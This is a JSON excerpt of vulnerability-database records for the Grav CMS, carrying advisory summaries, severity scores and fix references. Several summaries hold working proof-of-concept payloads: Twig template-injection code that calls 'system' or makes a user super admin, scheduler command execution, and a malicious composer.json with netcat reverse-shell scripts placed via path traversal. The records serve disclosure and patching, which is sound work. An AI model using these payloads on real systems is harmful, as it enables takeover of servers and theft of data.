type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:04:26Z/"}],"url":"https://github.com/
getgrav/grav/security/advisories/GHSA-h756-wh59-hhjv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66295","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66295"},{"reference_url":"https://github.com/advisories/GHSA-h756-wh59-hhjv","reference_id":"GHSA-h756-wh59-hhjv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h756-wh59-hhjv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66295","GHSA-h756-wh59-hhjv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-31dk-jdqj-pfag"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/11742?format=json","vulnerability_id":"VCID-47rc-kqnw-7ue8","summary":"Server Side Template Injection (SSTI)\n### Summary\nGrav validates accessible functions through the Utils::isDangerousFunction function, but does not impose restrictions on twig functions like twig_array_map, allowing attackers to bypass the validation and execute arbitrary commands.\n\n### Details\n```\n{{ grav.twig.twig.getFunction('twig_array_map')|var_dump }}\n```\n![image](https://user-images.githubusercontent.com/46442697/281397674-6098806a-e936-4849-956e-d394a7c037da.png)\n\nWhen we accessed twig_array_map like this, we confirmed that the twigFunction object is properly returned. 
Since the callable property is correctly included, we can access twig_array_map without any restrictions.\n\n```\n{% set cmd = {'id':'system'} %}\n{{ twig_array_map(grav.twig.twig,cmd,'call_user_func')|join }}\n```\nSince there is no validation on twig_array_map itself, it is possible to call arbitrary function using call_user_func.\n\n### PoC\n```\n{% set cmd = {'id':'system'} %}\n{{ twig_array_map(grav.twig.twig,cmd,'call_user_func')|join }}\n```\n\n### Impact\nTwig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages.\nAs the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28117","reference_id":"","reference_type":"","scores":[{"value":"0.00482","scoring_system":"epss","scoring_elements":"0.65454","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28117"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T19:11:01Z/"}],"url":"https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-qfv4-q44r-g7
rv","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T19:11:01Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-qfv4-q44r-g7rv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28117","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28117"},{"reference_url":"https://github.com/advisories/GHSA-qfv4-q44r-g7rv","reference_id":"GHSA-qfv4-q44r-g7rv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qfv4-q44r-g7rv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33336?format=json","purl":"pkg:composer/getgrav/grav@1.7.45","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"
vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45"}],"aliases":["CVE-2024-28117","GHSA-qfv4-q44r-g7rv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-47rc-kqnw-7ue8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30095?format=json","vulnerability_id":"VCID-6gtj-f6gc-d3bf","summary":"Grav vulnerable to Privilege Escalation and Authenticated Remote Code Execution via Twig Injection\n### Summary\nA user with admin panel access and permissions to create or edit pages in Grav CMS can enable Twig processing in the page frontmatter. By injecting malicious Twig expressions, the user can escalate their privileges to admin or execute arbitrary system commands via the scheduler API. 
This results in both Privilege Escalation (PE) and Remote Code Execution (RCE) vulnerabilities.\n\n### Details\nGrav CMS allows Twig to be executed in page templates if enabled in admin panel (process: twig: true).\nA user with publisher/editor privileges, that can create or edit pages and enable twig processing, can thereby inject arbitrary code that will execute in the context of the page render.\n\nThis enables exploitation of Grav internal APIs such as:\n- `grav.user.update()` and `grav.user.save()` for escalating the current user to super admin or admin\n- `grav.scheduler.addCommand()`, `grav.scheduler.save()` and `grav.scheduler.run()` for code execution\n\nThe Twig sandbox is not enforced in this context, allowing full access to any backend PHP object and method in the `system/src/Grav/Common` directory.\n\n### PoC\n#### Preconditions:\n- You must have access to a **non-admin** user with permission to create/edit pages (```admin.pages``` access)\n- For Privilege Escalation, you also have to be logged in to the site with the same user as the admin panel.\n\n#### Steps to reproduce Privilege Escalation:\n1. Login into the non-admin page (default at `cms-url/login`).\n2. Login to the admin panel, create or edit a page and set the Twig processing to true (Advanced -> Process: Twig: true).\n3. Inject the following payload into the page content to escalate privileges:\n```\n{% set _ = grav.user.update({\n    'access': {\n        'admin': {\n            'login': true,\n            'super': true\n        }\n    }\n}, {}) %}\n{% set _ = grav.user.save() %}\n```\n4. Visit the edited/created page url. The logged in user is now admin. (*Note: For the changes to show, you need to log out of the admin panel and relogin).*\n\n#### Steps to reproduce Remote Code Execution:\n1. Login to the admin panel, create or edit a page and set the Twig processing to true (Advanced -> Process: Twig: true).\n2. 
Inject the following payload into the page content to execute commands:\n```\n{% set _ = grav.scheduler.addCommand('curl', ['http://localhost:8000']) %}\n{% set _ = grav.scheduler.save() %}\n{% set _ = grav.scheduler.run() %}\n```\n3. Visit the page to trigger the execution. The system will issue a `curl` request.\n\n### Impact\nThis vulnerability allows:\n- Privilege Escalation from any user with page editing capabilities to full admin (super) access.\n- Remote Code Execution, as the attacker can run system arbitrary commands via the scheduler API.\n\nIt affects any Grav CMS installation where users with lower privileges are allowed to create or edit pages and Twig processing is not globally disabled.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66297","reference_id":"","reference_type":"","scores":[{"value":"0.00475","scoring_system":"epss","scoring_elements":"0.65099","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66297"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:26:40Z/"}],"url":"https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458"},{"reference_url":"https://github.com/getgrav/grav/security/advisorie
s/GHSA-858q-77wx-hhx6","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:26:40Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-858q-77wx-hhx6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66297","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66297"},{"reference_url":"https://github.com/advisories/GHSA-858q-77wx-hhx6","reference_id":"GHSA-858q-77wx-hhx6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-858q-77wx-hhx6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66297","GHSA-858q-77wx-hhx6"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6gtj-f6gc-d3bf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30263?format=json","vulnerability_id":"VCID-91ht-8cax-7kdr","summary":"Grav is vulnerable to a DOS on the admin panel\n# DOS on the admin panel\n**Severity Rating:** Medium \n\n**Vector:** Denial Of 
Service\n\n**CVE:** XXX\n\n**CWE:** 400 - Uncontrolled Resource Consumption\n\n**CVSS Score:** 4.9\n\n**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H\n\n## Analysis\n\nA Denial of Service (DoS) vulnerability has been identified in the application related to the handling of `scheduled_at` parameters. Specifically, the application fails to properly sanitize input for cron expressions. By manipulating the `scheduled_at` parameter with a malicious input, such as a single quote, the application admin panel becomes non-functional, causing significant disruptions to administrative operations.\n\nThe only way to recover from this issue is to manually access the host server and modify the `backup.yaml` file to correct the corrupted cron expression\n\n## Proof of Concept\n\n1) Change the value of `scheduled_at` parameter to `'` as shown in the following figures at the `http://127.0.0.1/admin/tools` endpoint, and observe the response in the second figure:\n  ![gravdos2](https://github.com/user-attachments/assets/b2d8935f-c8ba-4eda-998a-8a20b3d5ef7c)\n  *Figure: Http request on tool endpoint*\n![gravdos3](https://github.com/user-attachments/assets/2a283254-316a-45b3-a5ac-6804e2494cd7)\n  *Figure: Http response on tool endpoint*\n\n2) When trying to access the admin panel, the panel is broken as shown in the following figure. 
Additionally, the value change is reflected in the `backup.yaml` file, as shown in the second figure:\n  ![gravdos4](https://github.com/user-attachments/assets/1257adcb-96c4-4b30-864e-9aa01e410ded)\n  *Figure: Error message view*\n![gravdos5](https://github.com/user-attachments/assets/4cef7c49-6a1e-4414-8332-3195aa2dfc77)\n  *Figure: Backup.yaml file*\n\n\n## Workarounds\nNo workaround is currently known\n\n# Timeline\n**2024-07-24** Issue identified\n\n**2024-09-27** Vendor contacted\n\n\n# About X41 D-Sec GmbH\nX41 is an expert provider for application security services.\nHaving extensive industry experience and expertise in the area of information\nsecurity, a strong core security team of world class security experts enables\nX41 to perform premium security services.\n\nFields of expertise in the area of application security are security centered\ncode reviews, binary reverse engineering and vulnerability discovery.\nCustom research and IT security consulting and support services are core\ncompetencies of 
X41.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66303","reference_id":"","reference_type":"","scores":[{"value":"0.00138","scoring_system":"epss","scoring_elements":"0.33536","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66303"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-03T15:10:29Z/"}],"url":"https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-x62q-p736-3997","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-03T15:10:29Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-x62q-p736-3997"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66303","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/
S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66303"},{"reference_url":"https://github.com/advisories/GHSA-x62q-p736-3997","reference_id":"GHSA-x62q-p736-3997","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x62q-p736-3997"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66303","GHSA-x62q-p736-3997"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-91ht-8cax-7kdr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/11511?format=json","vulnerability_id":"VCID-9h5a-h26f-cudw","summary":"Grav File Upload Path Traversal\n### Summary\nGrav is vulnerable to a file upload path traversal vulnerability, that can allow an adversary to replace or create files with extensions such as .json, .zip, .css, .gif, etc. 
This vulnerabiltiy can allow attackers to inject arbitrary code on the server, undermine integrity of backup files by overwriting existing backups or creating new ones, and exfiltrating sensitive data using CSS Injection exfiltration techniques.\n\n### Installation Configuration\n- Grav CMS 1.10.44\n- Apache web server\n- php-8.2\n\n### Details\n_**Vulnerable code location:**_ grav/system/src/Grav/Common/Media/Traits/MediaUploadTrait.php/checkFileMetadata() method_\n\n    public function checkFileMetadata(array $metadata, string $filename = null, array $settings = null): string\n    {\n        // Add the defaults to the settings.\n        $settings = $this->getUploadSettings($settings);\n\n        // Destination is always needed (but it can be set in defaults).\n        $self = $settings['self'] ?? false;\n        if (!isset($settings['destination']) && $self === false) {\n            throw new RuntimeException($this->translate('PLUGIN_ADMIN.DESTINATION_NOT_SPECIFIED'), 400);\n        }\n\n        if (null === $filename) {\n            // If no filename is given, use the filename from the uploaded file (path is not allowed). \n            $folder = '';\n            $filename = $metadata['filename'] ?? '';\n        } else {\n            // If caller sets the filename, we will accept any custom path.\n            $folder = dirname($filename); `-> Vulnerable Code`\n            if ($folder === '.') {\n                $folder = '';\n            }\n            $filename = Utils::basename($filename);\n\n### PoC\n\n1. Log in to the Grav CMS using a super administrator account.\n2. Add a user in the \"Accounts\" section with the following permissions:\n- Login to Admin\n- Page Update\n3. Log out of the super administrator account and log in with the previously created user account.\n4. Navigate to the https://<grav>admin/pages/home.\n5. 
Use the following command in Kali Linux to open a netcat listener:\n```\nnc -lvnp 8081\n```\n![image](https://user-images.githubusercontent.com/48800246/296318900-cc257c4f-e67e-45af-a2a1-1ee5d7e6d165.png)\nNote: \"nc\" or netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. We are using this tool to get a reverse shell from the server hosting Grav CMS.\n7. Using a web interception proxy, click on the \"Page Media\" section and upload a json file with the following added to the \"scripts\" section (https://getcomposer.org/doc/articles/scripts.md):\n```\n\"post-install-cmd\": \"nc <IP-address> 8081 -e /bin/bash\",\n\"post-update-cmd\": \"nc <IP-address> 8081 -e /bin/bash\"\n```\n**_Note:_** The post installation and update script used in this PoC is only for demonstration purposes. There are various other scripts that may be injected such as `command` that executes the corresponding script before any Composer Command is executed on the CLI.\n![image](https://user-images.githubusercontent.com/48800246/296317602-89fe155d-34a7-4b35-a6b4-d1964057ce65.png)\n_Note: . Please replace <IP-address> with the IP address of the Kali Linux netcat listener._\n8. Modify the \"name\" parameter to \"../../../c/omposer.json\" and forward the request.\n9. Observe the successful upload message from the server response:\n![image](https://user-images.githubusercontent.com/48800246/296320057-fcc0d456-c282-42eb-bcf0-1155d4b5d24a.png)\n10. In the Grav web root, observe that the \"composer.json\" file was successfully replaced by the malicious \"composer.json\" file containing a reverse shell script.\n11. Run any variations of the following commands in the Grav web server and observe the successful reverse shell:\n- bin/grav composer\n- composer update\n- composer install\n![image](https://user-images.githubusercontent.com/48800246/296322101-5654dee4-44ba-4806-9dc7-25d8e0240486.png)\n\n### Impact\n\n1. 
**Arbitrary Code Injection:** Attackers can replace the composer.json file with a malicious one containing arbitratry composer scripts. This can result in code execution when the `composer` command is used for any purpose in the server.  that can allow attackers to get a reverse shell on the server.\n\n2. **Backup Compromise:** .zip backup files can be replaced, undermining data integrity and recovery mechanisms:\n![image](https://github.com/getgrav/grav/assets/48800246/94ab1546-a576-43a7-ac6e-f72acee74fb8)\n![image](https://github.com/getgrav/grav/assets/48800246/7f29b597-ca17-4e17-a949-c8658e567caa)\n\n3. **Sensitive Information Exposure:** Modification of .css files provides an avenue for attackers to exfiltrate sensitive information, such as usernames and passwords, compromising confidentiality.\n![image](https://github.com/getgrav/grav/assets/48800246/ed492d7b-0776-4a56-8b8f-fde7b8c9ea99)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27921","reference_id":"","reference_type":"","scores":[{"value":"0.08787","scoring_system":"epss","scoring_elements":"0.92643","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27921"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/5928411b86bab05afca2b33db4e7386a44858e99","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-25T16:27:48Z/"}],"url
":"https://github.com/getgrav/grav/commit/5928411b86bab05afca2b33db4e7386a44858e99"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-m7hx-hw6h-mqmc","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-25T16:27:48Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-m7hx-hw6h-mqmc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27921","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27921"},{"reference_url":"https://github.com/advisories/GHSA-m7hx-hw6h-mqmc","reference_id":"GHSA-m7hx-hw6h-mqmc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m7hx-hw6h-mqmc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33336?format=json","purl":"pkg:composer/getgrav/grav@1.7.45","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3x
xa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45"}],"aliases":["CVE-2024-27921","GHSA-m7hx-hw6h-mqmc"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9h5a-h26f-cudw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30220?format=json","vulnerability_id":"VCID-9h65-8eka-quhd","summary":"Grav Exposes Password Hashes Leading to privilege escalation\n# Exposure of Password Hashes Leading to privilege escalation\n**Severity Rating:** Medium \n\n**Vector:** Privilege Escalation\n\n**CVE:** XXX\n\n**CWE:** 200 - Exposure of Sensitive Information\n\n**CVSS Score:** 6.2\n\n**CVSS Vector:** CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L\n\n## Analysis\n\nIt was observed that if a users is given read access on the user account management section of the admin panel can view the password hashes of all users, including the admin user. 
This exposure can potentially lead to privilege escalation if an attacker can crack these password hashes.\n\nAn attacker with read access can: \n* View and potentially crack the password hashes.\n* Gain administrative access by cracking the admin password hash.\n* Escalate privileges and compromise the entire admin panel.\n\n\n## Proof of Concept\n\n1) Give read access to user accounts to a random user as shown in the following figures:\n  ![grav0](https://github.com/user-attachments/assets/020a4b47-e577-49cb-8392-bfb61491199d)\n  ![grav2](https://github.com/user-attachments/assets/97fbfc46-c541-4559-9541-2b9b5de86c0e)\n  \n\n2) Log in to the admin panel with an account that has read access to user accounts and navigate to the user account management section.\n\n3) Go to the admin profile `http://127.0.0.1/admin/accounts/users/admin`; The password is not display. Try inspecting the page source code as shown in the following figures:\n  ![grav2-1](https://github.com/user-attachments/assets/057c9c14-f928-4584-99ae-4939f63dda57)\n  \n   You can see that it match the hash that is in the admin.yaml file :\n  ![Compare to the hash in database of the admin](grav2-2.png)\n  \n\n4) Crack the hash as shown in the following figure, the algorithm use here is bcrypt:\n  \n![grav3](https://github.com/user-attachments/assets/ec334f80-4b87-4010-a834-cb92704a596e)\n  \n\n## Workarounds\nNo workaround is currently known\n\n# Timeline\n**2024-07-24** Issue identified\n\n**2024-09-27** Vendor contacted\n\n\n# About X41 D-Sec GmbH\nX41 is an expert provider for application security services.\nHaving extensive industry experience and expertise in the area of information\nsecurity, a strong core security team of world class security experts enables\nX41 to perform premium security services.\n\nFields of expertise in the area of application security are security centered\ncode reviews, binary reverse engineering and vulnerability discovery.\nCustom research and IT security consulting and 
